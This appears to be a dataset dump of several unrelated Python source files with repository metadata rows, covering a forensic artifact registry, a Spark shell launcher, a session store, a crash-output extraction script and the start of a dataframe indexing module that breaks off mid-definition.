def GetArtifact(self, name):
"""Get artifact by name.
Args:
name: artifact name string.
Returns:
artifact object.
Raises:
ArtifactNotRegisteredError: if artifact doesn't exist in the registry.
"""
self._CheckDirty()
result = self._artifacts.get(name)
if not result:
raise rdf_artifacts.ArtifactNotRegisteredError(
"Artifact %s missing from registry. You may need to sync the "
"artifact repo by running make in the artifact directory." % name)
return result
@utils.Synchronized
def GetArtifactNames(self, *args, **kwargs):
return set([a.name for a in self.GetArtifacts(*args, **kwargs)])
@utils.Synchronized
def SearchDependencies(self,
os_name,
artifact_name_list,
existing_artifact_deps=None,
existing_expansion_deps=None):
"""Return a set of artifact names needed to fulfill dependencies.
Search the path dependency tree for all artifacts that can fulfill
dependencies of artifact_name_list. If multiple artifacts provide a
dependency, they are all included.
Args:
os_name: operating system string
artifact_name_list: list of artifact names to find dependencies for.
existing_artifact_deps: existing dependencies to add to, for recursion,
e.g. set(["WindowsRegistryProfiles", "WindowsEnvironmentVariablePath"])
existing_expansion_deps: existing expansion dependencies to add to, for
recursion, e.g. set(["users.userprofile", "users.homedir"])
Returns:
(artifact_names, expansion_names): a tuple of sets, one with artifact
names, the other expansion names
"""
artifact_deps = existing_artifact_deps or set()
expansion_deps = existing_expansion_deps or set()
artifact_objs = self.GetArtifacts(
os_name=os_name, name_list=artifact_name_list)
artifact_deps = artifact_deps.union([a.name for a in artifact_objs])
for artifact in artifact_objs:
expansions = GetArtifactPathDependencies(artifact)
if expansions:
expansion_deps = expansion_deps.union(set(expansions))
# Get the names of the artifacts that provide those expansions
new_artifact_names = self.GetArtifactNames(
os_name=os_name, provides=expansions)
missing_artifacts = new_artifact_names - artifact_deps
if missing_artifacts:
# Add those artifacts and any child dependencies
new_artifacts, new_expansions = self.SearchDependencies(
os_name,
new_artifact_names,
existing_artifact_deps=artifact_deps,
existing_expansion_deps=expansion_deps)
artifact_deps = artifact_deps.union(new_artifacts)
expansion_deps = expansion_deps.union(new_expansions)
return artifact_deps, expansion_deps
@utils.Synchronized
def DumpArtifactsToYaml(self, sort_by_os=True):
"""Dump a list of artifacts into a yaml string."""
artifact_list = self.GetArtifacts()
if sort_by_os:
# Sort so its easier to split these if necessary.
yaml_list = []
for os_name in rdf_artifacts.Artifact.SUPPORTED_OS_LIST:
done = {a.name: a for a in artifact_list if a.supported_os == [os_name]}
# Separate into knowledge_base and non-kb for easier sorting.
done_sorted = list(sorted(done.values(), key=lambda x: x.name))
yaml_list.extend(x.ToYaml() for x in done_sorted if x.provides)
yaml_list.extend(x.ToYaml() for x in done_sorted if not x.provides)
artifact_list = [a for a in artifact_list if a.name not in done]
yaml_list.extend(x.ToYaml() for x in artifact_list) # The rest.
else:
yaml_list = [x.ToYaml() for x in artifact_list]
return "---\n\n".join(yaml_list)
REGISTRY = ArtifactRegistry()
def DeleteArtifactsFromDatastore(artifact_names, reload_artifacts=True):
"""Deletes a list of artifacts from the data store."""
artifacts_list = REGISTRY.GetArtifacts(
reload_datastore_artifacts=reload_artifacts)
to_delete = set(artifact_names)
deps = set()
for artifact_obj in artifacts_list:
if artifact_obj.name in to_delete:
continue
if GetArtifactDependencies(artifact_obj) & to_delete:
deps.add(str(artifact_obj.name))
if deps:
raise ValueError(
"Artifact(s) %s depend(s) on one of the artifacts to delete." %
(",".join(deps)))
found_artifact_names = set()
for artifact_value in artifacts_list:
if artifact_value.name in to_delete:
found_artifact_names.add(artifact_value.name)
if len(found_artifact_names) != len(to_delete):
not_found = to_delete - found_artifact_names
raise ValueError("Artifact(s) to delete (%s) not found." %
",".join(not_found))
for artifact_name in to_delete:
data_store.REL_DB.DeleteArtifact(str(artifact_name))
REGISTRY.UnregisterArtifact(artifact_name)
def ValidateSyntax(rdf_artifact):
"""Validates artifact syntax.
This method can be used to validate individual artifacts as they are loaded,
without needing all artifacts to be loaded first, as for Validate().
Args:
rdf_artifact: RDF object artifact.
Raises:
ArtifactSyntaxError: If artifact syntax is invalid.
"""
if not rdf_artifact.doc:
raise rdf_artifacts.ArtifactSyntaxError(rdf_artifact, "missing doc")
for supp_os in rdf_artifact.supported_os:
valid_os = rdf_artifact.SUPPORTED_OS_LIST
if supp_os not in valid_os:
detail = "invalid `supported_os` ('%s' not in %s)" % (supp_os, valid_os)
raise rdf_artifacts.ArtifactSyntaxError(rdf_artifact, detail)
for condition in rdf_artifact.conditions:
# FIXME(hanuszczak): It does not look like the code below can throw
# `ConditionException`. Do we really need it then?
try:
of = objectfilter.Parser(condition).Parse()
of.Compile(objectfilter.BaseFilterImplementation)
except rdf_artifacts.ConditionError as e:
detail = "invalid condition '%s'" % condition
raise rdf_artifacts.ArtifactSyntaxError(rdf_artifact, detail, e)
# Anything listed in provides must be defined in the KnowledgeBase
valid_provides = rdf_client.KnowledgeBase().GetKbFieldNames()
for kb_var in rdf_artifact.provides:
if kb_var not in valid_provides:
detail = "broken `provides` ('%s' not in %s)" % (kb_var, valid_provides)
raise rdf_artifacts.ArtifactSyntaxError(rdf_artifact, detail)
# Any %%blah%% path dependencies must be defined in the KnowledgeBase
for dep in GetArtifactPathDependencies(rdf_artifact):
if dep not in valid_provides:
detail = "broken path dependencies ('%s' not in %s)" % (dep,
valid_provides)
raise rdf_artifacts.ArtifactSyntaxError(rdf_artifact, detail)
for source in rdf_artifact.sources:
try:
source.Validate()
except rdf_artifacts.ArtifactSourceSyntaxError as e:
raise rdf_artifacts.ArtifactSyntaxError(rdf_artifact, "bad source", e)
def ValidateDependencies(rdf_artifact):
"""Validates artifact dependencies.
This method checks whether all dependencies of the artifact are present
and contain no errors.
This method can be called only after all other artifacts have been loaded.
Args:
rdf_artifact: RDF object artifact.
Raises:
ArtifactDependencyError: If a dependency is missing or contains errors.
"""
for dependency in GetArtifactDependencies(rdf_artifact):
try:
dependency_obj = REGISTRY.GetArtifact(dependency)
except rdf_artifacts.ArtifactNotRegisteredError as e:
raise rdf_artifacts.ArtifactDependencyError(
rdf_artifact, "missing dependency", cause=e)
message = dependency_obj.error_message
if message:
raise rdf_artifacts.ArtifactDependencyError(
rdf_artifact, "dependency error", cause=message)
def Validate(rdf_artifact):
"""Attempts to validate the artifact has been well defined.
This checks both syntax and dependencies of the artifact. Because of that,
this method can be called only after all other artifacts have been loaded.
Args:
rdf_artifact: RDF object artifact.
Raises:
ArtifactDefinitionError: If artifact is invalid.
"""
ValidateSyntax(rdf_artifact)
ValidateDependencies(rdf_artifact)
def GetArtifactDependencies(rdf_artifact, recursive=False, depth=1):
"""Return a set of artifact dependencies.
Args:
rdf_artifact: RDF object artifact.
recursive: If True recurse into dependencies to find their dependencies.
depth: Used for limiting recursion depth.
Returns:
A set of strings containing the dependent artifact names.
Raises:
RuntimeError: If maximum recursion depth reached.
"""
deps = set()
for source in rdf_artifact.sources:
# ARTIFACT is the legacy name for ARTIFACT_GROUP
# per: https://github.com/ForensicArtifacts/artifacts/pull/143
# TODO(user): remove legacy support after migration.
if source.type in (rdf_artifacts.ArtifactSource.SourceType.ARTIFACT,
rdf_artifacts.ArtifactSource.SourceType.ARTIFACT_GROUP):
if source.attributes.GetItem("names"):
deps.update(source.attributes.GetItem("names"))
if depth > 10:
raise RuntimeError("Max artifact recursion depth reached.")
deps_set = set(deps)
if recursive:
for dep in deps:
artifact_obj = REGISTRY.GetArtifact(dep)
new_dep = GetArtifactDependencies(artifact_obj, True, depth=depth + 1)
if new_dep:
deps_set.update(new_dep)
return deps_set
# TODO(user): Add tests for this and for all other Get* functions in this
# package.
def GetArtifactsDependenciesClosure(name_list, os_name=None):
"""For all the artifacts in the list returns them and their dependencies."""
artifacts = {
a.name: a
for a in REGISTRY.GetArtifacts(os_name=os_name, name_list=name_list)
}
dep_names = set()
for art in artifacts.values():
dep_names.update(GetArtifactDependencies(art, recursive=True))
if dep_names:
for dep in REGISTRY.GetArtifacts(os_name=os_name, name_list=dep_names):
artifacts[dep.name] = dep
return list(artifacts.values())
def GetArtifactPathDependencies(rdf_artifact):
"""Return a set of knowledgebase path dependencies.
Args:
rdf_artifact: RDF artifact object.
Returns:
A set of strings for the required kb objects e.g.
["users.appdata", "systemroot"]
"""
deps = set()
for source in rdf_artifact.sources:
for arg, value in source.attributes.items():
paths = []
if arg in ["path", "query"]:
paths.append(value)
if arg == "key_value_pairs":
# This is a REGISTRY_VALUE {key:blah, value:blah} dict.
paths.extend([x["key"] for x in value])
if arg in ["keys", "paths", "path_list", "content_regex_list"]:
paths.extend(value)
for path in paths:
for match in artifact_utils.INTERPOLATED_REGEX.finditer(path):
deps.add(match.group()[2:-2]) # Strip off %%.
deps.update(GetArtifactParserDependencies(rdf_artifact))
return deps
def GetArtifactParserDependencies(rdf_artifact):
"""Return the set of knowledgebase path dependencies required by the parser.
Args:
rdf_artifact: RDF artifact object.
Returns:
A set of strings for the required kb objects e.g.
["users.appdata", "systemroot"]
"""
factory = parsers.ArtifactParserFactory(str(rdf_artifact.name))
deps = set()
for p in factory.AllParserTypes():
deps.update(p.knowledgebase_dependencies)
return deps
| 34.846479
| 80
| 0.697506
|
5df40bff61181c7c5b1000e9fc7b836034fe22ce
| 1,255
|
py
|
Python
|
sparklingpandas/shell/shell.py
|
michalmonselise/sparklingpandas
|
cf4136b5cd21a22e4e61d5da9aa15a72fc3d565c
|
[
"Apache-2.0"
] | 245
|
2015-02-24T02:49:06.000Z
|
2021-11-16T11:25:02.000Z
|
sparklingpandas/shell/shell.py
|
michalmonselise/sparklingpandas
|
cf4136b5cd21a22e4e61d5da9aa15a72fc3d565c
|
[
"Apache-2.0"
] | 78
|
2015-02-19T23:38:36.000Z
|
2017-11-09T11:47:35.000Z
|
sparklingpandas/shell/shell.py
|
sparklingpandas/sparklingpandas
|
7d549df4348c979042b683c355aa778fc6d3a768
|
[
"Apache-2.0"
] | 49
|
2015-02-19T21:56:17.000Z
|
2020-11-30T22:20:23.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
An interactive shell.
This file is designed to be launched by bin/pyspark
"""
import sparklingpandas
from sparklingpandas.pcontext import PSparkContext
from pyspark.sql import SQLContext, HiveContext
from pyspark import SparkContext
spark_ctx = SparkContext()
sqlCtx = SQLContext(spark_ctx)
hiveCtx = HiveContext(sqlCtx)
sqlContext = sqlCtx
from pyspark.sql import Row
psc = PSparkContext(spark_ctx, sqlCtx)
print("Sparkling Pandas context is available as psc\n")
| 35.857143
| 74
| 0.787251
|
d4fb1e2284dbcabc1b50220b69770590a03680ae
| 3,713
|
py
|
Python
|
WebKit/SessionShelveStore.py
|
PeaceWorksTechnologySolutions/w4py
|
74f5a03a63f1a93563502b908474aefaae2abda2
|
[
"MIT"
] | null | null | null |
WebKit/SessionShelveStore.py
|
PeaceWorksTechnologySolutions/w4py
|
74f5a03a63f1a93563502b908474aefaae2abda2
|
[
"MIT"
] | null | null | null |
WebKit/SessionShelveStore.py
|
PeaceWorksTechnologySolutions/w4py
|
74f5a03a63f1a93563502b908474aefaae2abda2
|
[
"MIT"
] | null | null | null |
"""Session store using the shelve module."""
import os
import shelve
import threading
from MiscUtils import NoDefault
from SessionStore import maxPickleProtocol, SessionStore
class SessionShelveStore(SessionStore):
"""A session store implemented with a shelve object.
To use this store, set SessionStore in Application.config to 'Shelve'.
"""
_filename = 'Session.Store'
## Init ##
def __init__(self, app, restoreFiles=True, filename=None):
"""Initialize the session shelf.
If restoreFiles is true, existing shelve file(s) will be reused.
"""
SessionStore.__init__(self, app)
filename = os.path.join(app._sessionDir, filename or self._filename)
flag = 'c' if restoreFiles else 'n'
self._store = shelve.open(filename,
flag=flag, protocol=maxPickleProtocol)
self._lock = threading.RLock()
## Access ##
def __len__(self):
"""Return the number of sessions."""
return len(self._store)
def __getitem__(self, key):
"""Get a session item, reading it from the store."""
# multiple simultaneous read accesses are safe
return self._store[key]
def __setitem__(self, key, value):
"""Set a session item, writing it to the store."""
# concurrent write access is not supported
dirty = value.isDirty()
if self._alwaysSave or dirty:
with self._lock:
if dirty:
value.setDirty(False)
try:
self._store[key] = value
except Exception:
if dirty:
value.setDirty()
raise # raise original exception
def __delitem__(self, key):
"""Delete a session item from the store."""
with self._lock:
session = self[key]
if not session.isExpired():
session.expiring()
del self._store[key]
def __contains__(self, key):
"""Check whether the session store has a given key."""
return key in self._store
def __iter__(self):
"""Return an iterator over the stored session keys."""
return iter(self._store)
def keys(self):
"""Return a list with the keys of all the stored sessions."""
return self._store.keys()
def clear(self):
"""Clear the session store, removing all of its items."""
self._store.clear()
def setdefault(self, key, default=None):
"""Return value if key available, else default (also setting it)."""
with self._lock:
return self._store.setdefault(key, default)
def pop(self, key, default=NoDefault):
"""Return value if key available, else default (also remove key)."""
with self._lock:
if default is NoDefault:
return self._store.pop(key)
else:
return self._store.pop(key, default)
## Application support ##
def storeSession(self, session):
"""Save potentially changed session in the store."""
key = session.identifier()
if key not in self or self[key] is not session:
self[key] = session
def storeAllSessions(self):
"""Permanently save all sessions in the store.
Should be used (only) when the application server is shut down.
"""
self._store.close()
def cleanStaleSessions(self, task=None):
"""Clean stale sessions."""
SessionStore.cleanStaleSessions(self, task)
self.intervalSweep()
def intervalSweep(self):
"""The session sweeper interval function."""
self._store.sync()
| 30.434426
| 76
| 0.599246
|
bbc153fc5db07206ffa96e79908516821e381b82
| 8,785
|
py
|
Python
|
20210104tempdir/auto1k.py
|
lamdalamda/auto-moldflow
|
a067ed7fb4e39179a36016d813aa036bb41f77b6
|
[
"Apache-2.0"
] | null | null | null |
20210104tempdir/auto1k.py
|
lamdalamda/auto-moldflow
|
a067ed7fb4e39179a36016d813aa036bb41f77b6
|
[
"Apache-2.0"
] | null | null | null |
20210104tempdir/auto1k.py
|
lamdalamda/auto-moldflow
|
a067ed7fb4e39179a36016d813aa036bb41f77b6
|
[
"Apache-2.0"
] | null | null | null |
import itertools
import os
class csv(object):#extract information from csv
def __init__(self,filename="1200hf.csv"):
self.lines=open(filename,"r").readlines()
self.attributes=self.lines[0].split(",")
self.attributes[-1]=self.attributes[-1].replace("\n","")
self.datalines=self.lines[1:]
self.listdata=[]
self.attrdata={}
self.columns=len(self.attributes) #列数,即attribute数量
for i in self.attributes:
self.attrdata[i]=[]
for i in self.datalines:
thisline=[]
ii=i.split(",")
for j in range(0,len(ii)):
thisline.append(ii[j].replace("\n",""))
self.attrdata[self.attributes[j]].append(ii[j])
self.listdata.append(thisline)
self.rows=len(self.listdata)#抛去第一行的行数
def debug(self):
print(self.attrdata)
print(self.listdata)
input("debug")
def createdummy(self,dummyname="dummy",value="0"):
self.attrdata[dummyname]=[]
for i in range (0,self.rows):
self.attrdata[dummyname].append(value)
#debug pass 20201027
def generate_dicts(self,subtractlist=["melt_temp","mold_temp","flow_rate_r","dummy","pack_press","pack_time","pack_press","cool_time"],totheattrlist=["melt_temperature","mold_temperature","flow_rate","pack_start","pack_initial_pressure","pack_stop","pack_end_pressure","cool_time"]):#build the dictionary list from csv. 由subtractlist产生toheattrlist
self.generatedDicts=[]
for i in range (0,len(self.attrdata["melt_temp"])):
l={}
for j in range(0,len(subtractlist)):
l[totheattrlist[j]]=self.attrdata[subtractlist[j]][i].replace("\n","")
self.generatedDicts.append(l)
#print(generatedDicts)#debug pass
example_replace_dictionary_IM={"melt_temperature":1,"mold_temperature":2,"flow_rate":3,"pack_start":4,"pack_initial_pressure":5,"pack_stop":6,"pack_end_pressure":7,"cool_time":8}
class changexml(object):
def __init__(self,filenamepre="1",filename="IMxml.xml",studyname="IMxml.xml",replace_dict=example_replace_dictionary_IM):
self.lines=open(filename,"r").readlines()
self.newxml=open("./temp/"+str(filenamepre)+studyname,"w+")
for i in self.lines:
for j in replace_dict:
if j in i:
i=i.replace(j,str(replace_dict[j]))
print(i)
self.newxml.write(i)
def alphatest(filename="1200hf.csv",xmlname="IMxml.xml"): #alphatest for 1200hf.csv Pass
#alphatest workflow
try:
os.mkdir("temp")
except FileExistsError:
print("temp folder exist,continue")
k=csv(filename)
k.createdummy()
subtractlist=["melt_temp","mold_temp","flow_rate_r","dummy","pack_press","pack_time","pack_press","cool_time"]
totheattrlist=["melt_temperature","mold_temperature","flow_rate","pack_start","pack_initial_pressure","pack_stop","pack_end_pressure","cool_time"]
k.generate_dicts(subtractlist,totheattrlist)
kxmllist=[]
for i in range (0,len(k.generatedDicts)):
h=changexml(i,xmlname,filename+".xml",k.generatedDicts[i])
kxmllist.append(str(i)+filename+".xml")
m=studymod(kxmllist)
studys=m.generatebat()
r=runstudy(studys)
r.generatebat()
g=studyrlt(studys)
g.generatecommands()
g.generatebat()
mpis=generatempi(studys)
mpis.generate()
'''
class tcode(object):#trail on building xml from initial. Abandoned
def __init__(self,father_node=0,codeid=10707,codevalue=[0,18900000,14,18900000],codename=None):
tcode_node=domTree.createElement("TCode")
id_node=domTree.createElement("ID")
id_codeid=domTree.createTextNode(codeid)
id_node.appendChild(id_codeid)
tcode_node.appendChild(id_node)
for i in codevalue:
value_node=domTree.createElement("Value")
Value_value=domTree.createElement(i)
value_node.appendChild(Value_value)
tcode_node.appendChild(value_node)
father_node.appendChild(tcode_node)
tcode reference
<TCode>
<ID>10707</ID>
<Value>0</Value>
<Value>18900000</Value>
<Value>14</Value>
<Value>18900000</Value>
'''
class studymod(object):
def __init__(self,xmlstudy=[],studyfile="crims.sdy",moldflowpath=r"C:\Program Files\Autodesk\Moldflow Insight 2019\bin"):
#xmlstudy=kxmlstudy for alphatest
super().__init__()
self.xmls=xmlstudy
self.studyfile=studyfile
self.studymodpath='"'+moldflowpath+'\\studymod"'
def generatebat(self):
self.studymodbat=open("./temp/studymod.bat","w+")
self.newstudys=[]
for i in range(0,len(self.xmls)):
self.studymodbat.write(self.studymodpath+" "+self.studyfile+" "+self.xmls[i]+".sdy "+self.xmls[i]+"\n")
self.newstudys.append(self.xmls[i]+".sdy")
self.studymodbat.close()
return self.newstudys#所有产生的studyfile 的名字,列表格式
class runstudy(object):
def __init__(self,studys=[],command=" -temp temp -keeptmp ",moldflowpath=r"C:\Program Files\Autodesk\Moldflow Insight 2019\bin"):
#studys=studymod.newstudys for alphatest
super().__init__()
self.studys=studys
self.commands=command
self.runstudypath='"'+moldflowpath+'\\runstudy"'
def generatebat(self):
self.runstudybat=open("./temp/runstudy.bat","w+")
#self.newstudys=[]
for i in range(0,len(self.studys)):
self.runstudybat.write(self.runstudypath+self.commands+self.studys[i]+"\n")
#self.newstudys.append(self.xmls[i]+".sdy")
self.runstudybat.close()
#return self.newstudys#所有产生的studyfile 的名字,列表格式
class resultcommands(object):
def __init__(self,commanddict={" -result ":["6260"]," -node ":["128","124","27","23","126","79","74"]," -component ":["1","2"], " -unit metric":[" "]}):
self.cdict={}
for i in commanddict:
self.cdict[i]=[]
for j in commanddict[i]:
self.cdict[i].append(i+j)
self.clist=[]
for i in self.cdict:
self.clist.append(self.cdict[i])
self.commands=list(itertools.product(*tuple(self.clist)))
self.strcommands=[]
for i in self.commands:
self.strcommands.append("".join(i))
class studyrlt(object):#under construct
def __init__(self,studys=[],commanddict={" -result ":["6260"]," -node ":["128","124","27","23","126","79","74"]," -component ":["1","2"], " -unit metric":[" "]},moldflowpath=r"C:\Program Files\Autodesk\Moldflow Insight 2019\bin"):
#studys=studymod.newstudys for alphatest
super().__init__()
self.studys=studys
#self.commands=command
self.studyrltpath='"'+moldflowpath+'\\studyrlt" '
self.commanddict=commanddict
def generatecommands(self):
self.cdict={}
for i in self.commanddict:
self.cdict[i]=[]
for j in self.commanddict[i]:
self.cdict[i].append(i+j)
self.clist=[]
for i in self.cdict:
self.clist.append(self.cdict[i])
self.commands=list(itertools.product(*tuple(self.clist)))
self.strcommands=[]
for i in self.commands:
self.strcommands.append("".join(i))
return self.strcommands
def generatebat(self):
self.studyrltbat=open("./temp/studyrlt.bat","w+")
#self.newstudys=[]
for i in range(0,len(self.strcommands)):
for j in self.studys:
self.studyrltbat.write(self.studyrltpath+j+self.strcommands[i]+"\nrename "+j[:-3]+'val '+j+self.strcommands[i].replace(" ","")+'.val\n')
#self.newstudys.append(self.xmls[i]+".sdy")
self.studyrltbat.close()
class generatempi(object):
def __init__(self,studys=[],mpifilename="crims result.mpi",projectname="auto1k"):
self.studys=studys
self.mpifilename=mpifilename
self.pretexts='VERSION 1.0\nBEGIN PROJECT "'+projectname+'"\n'
self.subtexts="END PROJECT\nORGANIZE 0\nBEGIN PROPERTIES\nEND PROPERTIES\nLast Write Time: Thu Dec 31 13:12:04 2020"
def generate(self):
self.mpifile=open("./temp/"+self.mpifilename,"w+")
self.mpifile.write(self.pretexts)
for i in self.studys:
self.mpifile.write('STUDY "'+i[0:5].replace(".","")+'" '+i+"\n")
self.mpifile.write(self.subtexts)
return
#main
if __name__=='__main__':
alphatest("LS2.csv","IMxml.xml")
'''
1200hf.csv is a set of CRIMS process settings. can be changed
'''
# with open
| 41.244131
| 351
| 0.620262
|
d3bd0ced37a22df3c016f6843152134d31f4b8f4
| 6,406
|
py
|
Python
|
tools/outtakes.py
|
grische/whatstyle
|
eff02bfa45a75019ad4e470085ff7c4da51cb5c4
|
[
"MIT"
] | 169
|
2016-06-21T16:43:06.000Z
|
2022-01-24T23:01:45.000Z
|
tools/outtakes.py
|
grische/whatstyle
|
eff02bfa45a75019ad4e470085ff7c4da51cb5c4
|
[
"MIT"
] | 9
|
2017-10-15T03:27:28.000Z
|
2022-01-16T22:12:28.000Z
|
tools/outtakes.py
|
grische/whatstyle
|
eff02bfa45a75019ad4e470085ff7c4da51cb5c4
|
[
"MIT"
] | 9
|
2016-08-24T18:27:27.000Z
|
2021-12-22T10:27:32.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This script extracts program crashes from a dump file that was recorded with:
# whatstyle.py --color on --keeptempfiles --debug popenio ...
# The "--color on" is necessary so that it can be distinguished if a space character
# seperates two arguments or is part of the argument itself.
#
# Running 'outtakes.py < dump.txt' will create nested directories like
# outtakes/c_-4_396 that contain the returncode, standard input, output and error and
# an eventually a configfile from the dump.
# It should be sufficient to enter one of these directories and call ./callfmt.sh
# to reproduce a crash.
from __future__ import print_function
import sys
if (((sys.version_info[0] == 2) and (sys.version_info[1] < 7)) or (
(sys.version_info[0] == 3) and (sys.version_info[1] < 2))):
sys.stderr.write('Error: Python 2.7 or when running on Python 3 at least Python 3.2'
' is required to run whatstyle\n')
sys.exit(1)
import argparse
import errno
import os
import re
import shutil
try:
from shlex import quote as shellquote
except ImportError:
from pipes import quote as shellquote
from collections import Counter
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY2:
text_type = unicode
binary_type = str
else:
text_type = str
binary_type = bytes
DESTDIR = 'outtakes'
HAS_FSCODEC = hasattr(os, 'fsdecode')
def unistr(text, errors='strict'):
if isinstance(text, text_type):
return text
try:
return text.decode('utf-8', errors=errors)
except UnicodeDecodeError:
if HAS_FSCODEC:
return os.fsdecode(text)
raise
def bytestr(text):
if isinstance(text, binary_type):
return text
try:
return text.encode('utf-8')
except UnicodeEncodeError:
if HAS_FSCODEC:
return os.fsencode(text)
raise
def rawstream(fp):
if PY3:
try:
return fp.buffer
except AttributeError:
# There might be a BytesIO behind fp.
pass
return fp
def write(s, fp=None):
"""Write s to the binary stream fp (default is stdout).
"""
efp = fp if fp is not None else sys.stdout
rawstream(efp).write(bytestr(s))
def outline(s=b'', end=b'\n', fp=None):
write(bytestr(s) + bytestr(end), fp=fp)
re_ansi = re.compile(br'\x1b\[(?:\d*(?:;\d+)*)m')
def extract_outtakes(filename, maxpercode=0):
re_lengths = re.compile(br'debug_popen: len\(stdin\):(\d+) => returncode:(-?\d+)'
br' len\(stdout\):(\d+) len\(stderr\):(\d+)')
valid_retcodes = set(range(100))
retcounters = Counter()
with open(filename, 'rb') as fp:
count = 0
cfgfile = None
command = None
while True:
line = fp.readline()
if not line:
break
prefix = b'debug_popen: '
m = re_lengths.match(line)
if m:
lin, retcode, lout, lerr = [int(x) for x in m.groups()]
if retcode in valid_retcodes:
continue
if 1 <= maxpercode <= retcounters[retcode]:
continue
retcounters[retcode] += 1
otdir = os.path.join(DESTDIR, "c_%s_%s" % (str(retcode), str(count)))
try:
os.makedirs(otdir)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
if command:
fname = os.path.join(otdir, 'callfmt.sh')
with open(fname, 'wb') as cfg:
if lin > 0:
command = command + b' < stdin.txt'
cfg.write(command + b'\n')
os.chmod(fname, 0o755)
command = None
with open(os.path.join(otdir, 'retcode.txt'), 'wb') as cfg:
cfg.write(bytestr(str(retcode)) + b'\n')
if cfgfile:
shutil.copyfile(cfgfile, os.path.join(otdir, os.path.basename(cfgfile)))
cfgfile = None
for chan, chanlen in zip(['stdin', 'stdout', 'stderr'], [lin, lout, lerr]):
if chanlen == 0:
continue
line = fp.readline()
if line == b'debug_popenio: ' + bytestr(chan) + b':"""\\\n':
data = fp.read(chanlen)
with open(os.path.join(otdir, '%s.txt' % chan), 'wb') as cfp:
cfp.write(data)
fp.readline() # This should be """
elif line.startswith(prefix):
line = line[len(prefix):]
line = line.rstrip(b'\r\n')
args = re_ansi.split(line)
cmdargs = []
if len(args) > 1 and not args[0] and not args[-1]:
for idx, arg in enumerate(args[1:-1]):
if idx % 2 == 1:
if arg == b' ':
continue
else:
write(b"Unexpected debug_popen line: " + line, fp=sys.stderr)
uarg = arg.decode('raw-unicode-escape')
if idx > 0 and os.path.abspath(arg) and os.path.isfile(arg):
cfgfile = uarg
uarg = os.path.basename(uarg)
cmdargs.append(shellquote(uarg).encode('raw-unicode-escape'))
if cmdargs:
command = b' '.join(cmdargs)
count += 1
return 0
def main():
parser = argparse.ArgumentParser(description='Extract data from formatter crashes')
parser.add_argument('filename', help='input dump filename')
parser.add_argument('--maxpercode',
type=int,
default=-1,
help='only extract this many calls per returncode\n'
' 0 means unlimited (default: 10)')
args = parser.parse_args()
if not args.filename:
parser.error('Please specify the input dump filename')
return extract_outtakes(args.filename, maxpercode=args.maxpercode)
if __name__ == '__main__':
sys.exit(main())
| 33.89418
| 93
| 0.52966
|
fb7ff00ae74fd29b817efd0d5c0238c9396a3962
| 38,694
|
py
|
Python
|
mars/dataframe/indexing/index_lib.py
|
ueshin/mars
|
0b542974243be4e0ff239eaf49ab0fb2935f3361
|
[
"Apache-2.0"
] | 1
|
2020-06-25T13:51:16.000Z
|
2020-06-25T13:51:16.000Z
|
mars/dataframe/indexing/index_lib.py
|
ueshin/mars
|
0b542974243be4e0ff239eaf49ab0fb2935f3361
|
[
"Apache-2.0"
] | null | null | null |
mars/dataframe/indexing/index_lib.py
|
ueshin/mars
|
0b542974243be4e0ff239eaf49ab0fb2935f3361
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
from collections import namedtuple
from typing import List, Union, Tuple
import numpy as np
import pandas as pd
from pandas.core.dtypes.cast import find_common_type
from ...core import TileableEntity, Chunk
from ...operands import OperandStage
from ...tiles import TilesError
from ...tensor.core import TENSOR_TYPE
from ...tensor.indexing.index_lib import IndexHandlerContext, IndexHandler, \
IndexInfo, IndexType, ChunkIndexInfo as ChunkIndexInfoBase, \
SliceIndexHandler as SliceIndexHandlerBase, \
NDArrayBoolIndexHandler as NDArrayBoolIndexHandlerBase, \
TensorBoolIndexHandler as TensorBoolIndexHandlerBase, \
IntegralIndexHandler, IndexesHandler
from ...tensor.utils import split_indexes_into_chunks, calc_pos, \
filter_inputs, slice_split, calc_sliced_size, to_numpy
from ...utils import check_chunks_unknown_shape, classproperty
from ..core import SERIES_CHUNK_TYPE, IndexValue
from ..operands import ObjectType
from ..utils import parse_index
from .utils import convert_labels_into_positions
ChunkIndexAxisInfo = namedtuple(
'chunk_index_axis_info',
['output_axis_index', 'processed_index', 'output_shape', 'index_value', 'dtypes'])
class ChunkIndexInfo(ChunkIndexInfoBase):
def __init__(self):
super().__init__()
self.index_values = []
self.dtypes = None
def set(self, info: ChunkIndexAxisInfo):
super().set(info)
if getattr(info, 'index_value', None) is not None:
self.index_values.append(info.index_value)
if getattr(info, 'dtypes', None) is not None:
self.dtypes = info.dtypes
class FancyIndexInfo(IndexInfo):
def __init__(self,
index_type: IndexType,
input_axis: int,
output_axis: int,
raw_index,
handler):
super().__init__(index_type, input_axis, output_axis,
raw_index, handler)
# extra info for DataFrame fancy index
# split info
# - chunk_index_to_fancy_index_arrays
# - chunk_index_to_raw_positions
# - is_fancy_index_asc_sorted
self.split_info = None
class LabelFancyIndexInfo(IndexInfo):
def __init__(self,
index_type: IndexType,
input_axis: int,
output_axis: int,
raw_index,
handler):
super().__init__(index_type, input_axis, output_axis,
raw_index, handler)
# store chunk_index -> labels
self.chunk_index_to_labels = None
self.is_label_asc_sorted = None
class DataFrameIndexHandlerContext(IndexHandlerContext):
def set_tileable(self, tileable: TileableEntity):
for chunk in tileable.chunks:
self.chunk_index_to_info[chunk.index] = ChunkIndexInfo()
def concat_chunks(self,
chunks: List[Chunk],
